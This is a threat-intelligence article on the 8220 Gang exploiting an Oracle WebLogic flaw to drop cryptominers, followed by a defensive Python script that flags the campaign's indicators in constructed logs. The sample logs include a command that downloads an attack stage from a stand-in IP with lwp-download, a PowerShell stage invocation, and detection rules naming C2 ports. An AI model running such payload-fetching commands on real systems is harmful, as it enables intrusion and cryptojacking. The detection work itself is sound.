Script kiddie group 8220 has matured and adopted new attack techniques

    The cloud-focused group may have changed its goals in exploiting Oracle technologies.

    Trend Micro researchers described a new campaign by the 8220 Gang (8220 Mining Group) in which the attackers exploited a six-year-old Oracle WebLogic vulnerability to deliver a cryptominer to the compromised system.

    The attacks used CVE-2017-3506 (CVSS: 7.4), a vulnerability in the WLS Security component of Oracle WebLogic that allows remote execution of arbitrary commands via an HTTP request carrying a specially crafted XML document. The flaw makes it possible to gain unauthorized access to confidential data or to compromise the system.

    8220 abused the HTTP URI "wls-wsat/CoordinatorPortType" to break into the system. After gaining access, the attackers delivered a PowerShell script that downloaded an executable (including cryptominers) from the IP address of the command-and-control (C2) server.

    The downloaded file loads a DLL that is injected into the MSBuild process. The DLL is heavily obfuscated to hinder analysis. Its configuration data is Base64-encoded, and the next stage of communication goes through three C2 servers on the same TCP ports, 9090, 9091 or 9092, from which the cryptominer is downloaded.

    In recent attacks the group also used "lwp-download", a Linux utility for downloading a file from a specified URL. Researchers have also observed this utility being used to compromise Windows systems.

    Abuse of "lwp-download" can be expected to continue in the short term as the group compromises and targets other platforms. Despite reusing tools and C2 servers, the 8220 group has begun attacking Windows systems and using new files and C2 servers to evade detection.
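    The intrusion chain described above (a request to the WLS-WSAT endpoint, a PowerShell stage, a DLL loaded into MSBuild, outbound connections to C2 on TCP 9090-9092, and "lwp-download" appearing on Windows hosts) gives a defender several concrete things to look for. The following script is an added example written for this page; it is not code from the article, Trend Micro or Fortinet. It runs a handful of simple detection rules over constructed sample logs. The access-log format (Apache combined), the key=value endpoint telemetry format, the hostnames, the IP addresses and the "MSBuild spawned by PowerShell" parent-process heuristic are all assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Indicators taken from the article: the WebLogic endpoint abused for initial
# access, the C2 TCP ports used to fetch the miner, and the lwp-download utility
# that was observed on Windows hosts.
WEBLOGIC_ENDPOINT = "wls-wsat/CoordinatorPortType"
C2_PORTS = {9090, 9091, 9092}

# Constructed sample web-server access log (Apache combined format). The IPs are
# documentation ranges; the second line models a request to the abused endpoint.
ACCESS_LOG = """\
10.0.0.5 - - [01/May/2023:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
198.51.100.7 - - [01/May/2023:10:00:03 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1024
10.0.0.9 - - [01/May/2023:10:00:04 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2048
"""

# Constructed endpoint telemetry (hypothetical format): one event per line,
# "<timestamp> <proc|net> key=value ...", with quoted values allowed.
ENDPOINT_LOG = """\
2023-05-01T10:00:05Z proc host=web01 image=powershell.exe parent=beasvc.exe cmd="powershell -NoProfile -File stage.ps1"
2023-05-01T10:00:06Z net host=web01 image=powershell.exe dst=203.0.113.10 dport=9090
2023-05-01T10:00:07Z proc host=web01 image=msbuild.exe parent=powershell.exe cmd="MSBuild.exe"
2023-05-01T10:00:08Z net host=web01 image=msbuild.exe dst=203.0.113.11 dport=443
2023-05-01T10:01:00Z proc host=web02 image=lwp-download parent=cmd.exe cmd="lwp-download http://203.0.113.12/stage"
2023-05-01T10:02:00Z net host=web03 image=chrome.exe dst=93.184.216.34 dport=443
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
# key=value pairs; the value is either a double-quoted string or a bare token.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Finding:
    rule: str
    host: str   # source IP for web findings, hostname for endpoint findings
    detail: str


def parse_access_log(text):
    """Parse combined-format access log lines into dicts; skip unparsable lines."""
    requests = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            requests.append(m.groupdict())
    return requests


def parse_endpoint_log(text):
    """Parse '<ts> <kind> k=v ...' telemetry lines into dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, kind, rest = line.split(" ", 2)
        fields = {k: (quoted or bare) for k, quoted, bare in KV_RE.findall(rest)}
        fields["ts"], fields["kind"] = ts, kind
        events.append(fields)
    return events


def detect(access_text, endpoint_text):
    """Apply the page's indicators as detection rules and return all findings."""
    findings = []

    # Rule 1: any request to the WLS-WSAT coordinator endpoint. Legitimate WS-AT
    # traffic may exist in some deployments, so tune this to your environment.
    for req in parse_access_log(access_text):
        if WEBLOGIC_ENDPOINT in req["path"]:
            findings.append(Finding("weblogic-wls-wsat-request", req["ip"],
                                    f'{req["method"]} {req["path"]} -> {req["status"]}'))

    for ev in parse_endpoint_log(endpoint_text):
        image = ev.get("image", "").lower()
        parent = ev.get("parent", "").lower()
        # Rule 2: outbound connection to the C2 ports named in the report.
        if ev["kind"] == "net" and int(ev.get("dport", 0)) in C2_PORTS:
            findings.append(Finding("c2-port-9090-9092", ev["host"],
                                    f'{image} -> {ev["dst"]}:{ev["dport"]}'))
        # Rule 3 (assumed heuristic): MSBuild started by PowerShell, matching the
        # PowerShell stage followed by a DLL injected into the MSBuild process.
        if ev["kind"] == "proc" and image == "msbuild.exe" and parent == "powershell.exe":
            findings.append(Finding("msbuild-spawned-by-powershell", ev["host"], ev.get("cmd", "")))
        # Rule 4: the Linux lwp-download utility executing on a Windows host.
        if ev["kind"] == "proc" and image == "lwp-download":
            findings.append(Finding("lwp-download-execution", ev["host"], ev.get("cmd", "")))
    return findings


if __name__ == "__main__":
    for f in detect(ACCESS_LOG, ENDPOINT_LOG):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

    Run against the constructed sample, the script raises four findings: the POST to the WLS-WSAT endpoint from 198.51.100.7, the PowerShell connection to port 9090 on web01, MSBuild started by PowerShell on web01, and lwp-download executing on web02. The port rule is the noisiest of the four on its own; in practice it is most useful correlated with the endpoint request or the process-chain rule on the same host within a short window.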

    Earlier, researchers from Fortinet FortiGuard Labs reported that the 8220 Gang cryptomining group is delivering a new crypter, ScrubCrypt, to compromised systems for cryptojacking. The attack chain begins with the exploitation of Oracle WebLogic servers to download PowerShell scripts that carry ScrubCrypt.

    Experts describe 8220 as low-skilled, financially motivated hackers who break into AWS, Azure, GCP, Aliyun and QCloud hosts through vulnerabilities in Docker, Redis, Confluence and Apache. The group also has its own cryptominer, PwnRig, based on the XMRig miner. PwnRig uses a fake FBI subdomain whose IP address points to a Brazilian government resource.

    Author DeepWeb